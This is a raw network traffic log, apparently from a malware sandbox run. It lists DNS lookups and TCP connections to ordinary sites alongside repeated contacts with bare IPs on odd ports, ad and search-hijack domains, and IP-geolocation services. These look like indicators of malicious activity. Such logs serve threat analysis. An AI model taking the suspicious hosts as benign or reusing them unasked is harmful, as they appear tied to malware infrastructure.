NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 35.241.13.201:443 beacons.gcp.gvt2.com tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
NL 142.250.179.131:443 beacons.gcp.gvt2.com tcp
US 206.189.199.186:12130 tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 feed.lookbox.net udp
US 172.67.164.57:443 feed.lookbox.net tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 www.redfin.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 www.redfin.com udp
US 8.8.8.8:53 www.redfin.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
NL 104.80.228.201:443 www.redfin.com tcp
NL 104.80.228.201:443 www.redfin.com tcp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.ask.com udp
US 151.101.2.114:443 www.ask.com tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:80 searchengineads.net tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 142.251.36.3:80 www.gstatic.com tcp
US 134.209.120.117:50424 tcp
US 3.234.28.191:443 searchada.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:80 searchengineads.net tcp
US 8.8.8.8:53 google.com udp
US 142.251.36.46:443 google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 searchengineads.net udp
US 8.8.8.8:53 c.amazon-adsystem.com udp
US 8.8.8.8:53 www.ask.com udp
US 8.8.8.8:53 cdn.p-n.io udp
US 8.8.8.8:53 accounts.google.com udp
NL 65.9.79.193:443 c.amazon-adsystem.com tcp
VN 103.63.108.18:80 searchengineads.net tcp
US 151.101.2.114:443 www.ask.com tcp
US 172.217.168.237:443 accounts.google.com tcp
NL 65.9.83.20:443 cdn.p-n.io tcp
US 208.67.222.222:53 td1-7ab2aedf80aeff31.elb.us-west-2.amazonaws.com tcp
US 208.67.222.222:53 www.search-on.live tcp
US 8.8.8.8:53 google.com udp
US 142.251.36.46:443 google.com tcp
US 8.8.8.8:53 c.amazon-adsystem.com udp
NL 65.9.79.193:443 c.amazon-adsystem.com tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 208.67.222.222:53 tcp
US 134.209.120.117:50424 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 maps.google.com udp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 142.251.36.14:443 maps.google.com tcp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 208.67.222.222:53 tcp
US 8.8.8.8:53 nl.ask.com udp
US 151.101.2.114:443 nl.ask.com tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 cdn.p-n.io udp
NL 65.9.83.20:443 cdn.p-n.io tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
US 206.189.199.186:12130 tcp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:80 searchengineads.net tcp
US 134.209.120.117:50424 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 delivery.askmediagroup.com udp
US 151.139.240.52:443 delivery.askmediagroup.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ds8tuylnjknkd.cloudfront.net udp
NL 65.9.84.194:443 ds8tuylnjknkd.cloudfront.net tcp
US 134.209.120.117:50424 tcp
US 8.8.8.8:53 ds8tuylnjknkd.cloudfront.net udp
NL 65.9.84.45:443 ds8tuylnjknkd.cloudfront.net tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.10:443 content-autofill.googleapis.com tcp
US 134.209.221.5:12411 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
CA 68.183.198.98:44374 tcp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 134.209.213.238:24807 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 104.21.15.206:443 feed.lookbox.net tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 134.209.221.5:25297 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 54.177.128.41:443 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
CA 68.183.198.98:44374 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 208.67.222.222:53 google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.170:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
CA 68.183.198.98:44374 tcp
CA 68.183.198.98:44374 tcp
US 208.67.222.222:53 tcp
CA 68.183.198.98:44374 tcp
US 172.217.160.78:443 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 208.67.222.222:53 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
CA 68.183.198.98:44374 tcp
US 208.67.222.222:53 tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 208.67.222.222:53 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
US 8.8.8.8:53 apis.google.com udp
NL 104.80.228.201:443 www.redfin.com tcp
NL 142.250.179.142:443 apis.google.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 216.58.208.106:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
US 206.189.199.186:12130 tcp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 mirror.cedia.org.ec udp
EC 201.159.221.67:443 mirror.cedia.org.ec tcp
US 208.67.222.222:53 www-googletagmanager.l.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
CA 68.183.198.98:44374 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 216.58.214.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 142.251.36.3:80 www.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
US 157.230.228.220:36706 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.170:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.170:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.42:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.170:443 content-autofill.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 206.189.199.186:12130 tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 134.209.221.45:50780 tcp
US 8.8.8.8:53 110.t.keepitpumpin.io udp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 8.8.8.8:53 www.directdexchange.com udp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:80 www.directdexchange.com tcp
US 8.8.8.8:53 112.t.keepitpumpin.io udp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 8.8.8.8:53 114.t.keepitpumpin.io udp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
US 8.8.8.8:53 113.t.keepitpumpin.io udp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
US 8.8.8.8:53 110.t.keepitpumpin.io udp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
FR 212.83.164.213:8080 114.t.keepitpumpin.io tcp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
FR 212.83.164.166:8080 113.t.keepitpumpin.io tcp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 157.230.215.30:14702 tcp
FR 163.172.204.15:8080 110.t.keepitpumpin.io tcp
US 134.209.213.195:51060 tcp
FR 212.83.164.37:8080 112.t.keepitpumpin.io tcp
US 157.230.235.41:30630 tcp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 104.248.115.228:12011 tcp
US 8.8.8.8:53 fernandomayol.com udp
KR 175.126.109.15:80 fernandomayol.com tcp
US 104.248.115.228:12011 tcp
US 8.8.8.8:53 data1.wotstats.com udp
US 45.76.0.226:80 data1.wotstats.com tcp
US 104.248.115.228:12011 tcp
US 104.248.115.228:12011 tcp
US 8.8.8.8:53 data1.wotstats.com udp
US 45.76.0.226:80 data1.wotstats.com tcp
US 104.248.115.228:12011 tcp
US 8.8.8.8:53 data1.wotstats.com udp
US 45.76.0.226:80 data1.wotstats.com tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
